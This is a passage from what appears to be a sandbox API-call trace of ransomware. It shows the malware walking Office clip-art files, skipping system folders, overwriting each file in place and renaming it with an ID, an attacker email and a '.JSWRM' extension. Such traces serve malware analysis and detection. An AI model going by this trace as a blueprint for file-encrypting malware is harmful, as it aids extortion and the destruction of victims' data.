ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00305_.WMF", cAlternateFileName="")) returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2=".") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="..") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="...") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="windows") returned -1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="recovery") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="perflogs") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="documents and settings") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="system volume information") returned -1 [0095.852] lstrcmpiW (lpString1="SO00305_.WMF", lpString2="msocache") returned 1 [0095.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00305_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00305_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00305_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00305_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00305_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00305_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.854] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31236) returned 1 [0095.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7a00) returned 0x24d210 [0095.854] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7a00, lpOverlapped=0x0) returned 1 [0095.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.858] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7a00, lpOverlapped=0x0) returned 1 [0095.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.859] CloseHandle (hObject=0x314) returned 1 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0095.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0095.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0095.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0095.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0095.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0095.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0095.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.860] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xee4a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00333_.WMF", cAlternateFileName="")) returned 1 [0095.860] lstrcmpiW (lpString1="SO00333_.WMF", lpString2=".") returned 1 [0095.860] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="..") returned 1 [0095.860] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="...") returned 1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="windows") returned -1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="recovery") returned 1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="perflogs") returned 1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="documents and settings") returned 1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="system volume information") returned -1 [0095.861] lstrcmpiW (lpString1="SO00333_.WMF", lpString2="msocache") returned 1 [0095.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00333_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00333_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00333_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00333_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00333_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00333_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.862] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=61002) returned 1 [0095.862] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee40) returned 0x24d210 [0095.863] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xee40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xee40, lpOverlapped=0x0) returned 1 [0095.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.869] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xee40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xee40, lpOverlapped=0x0) returned 1 [0095.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.870] CloseHandle (hObject=0x314) returned 1 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0095.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0095.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0095.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.871] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b96, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00345_.WMF", cAlternateFileName="")) returned 1 [0095.871] lstrcmpiW (lpString1="SO00345_.WMF", lpString2=".") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="..") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="...") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="windows") returned -1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="recovery") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="perflogs") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="documents and settings") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="system volume information") returned -1 [0095.872] lstrcmpiW (lpString1="SO00345_.WMF", lpString2="msocache") returned 1 [0095.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00345_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00345_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00345_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0095.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00345_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00345_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00345_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0095.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.873] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35734) returned 1 [0095.873] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b90) returned 0x24d210 [0095.874] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8b90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8b90, lpOverlapped=0x0) returned 1 [0095.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.913] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8b90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8b90, lpOverlapped=0x0) returned 1 [0095.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.914] CloseHandle (hObject=0x314) returned 1 [0095.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0095.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0095.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0095.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0095.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.915] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.916] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00350_.WMF", cAlternateFileName="")) returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2=".") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="..") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="...") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="windows") returned -1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="recovery") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="perflogs") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="documents and settings") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="system volume information") returned -1 [0095.916] lstrcmpiW (lpString1="SO00350_.WMF", lpString2="msocache") returned 1 [0095.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00350_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00350_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00350_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00350_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 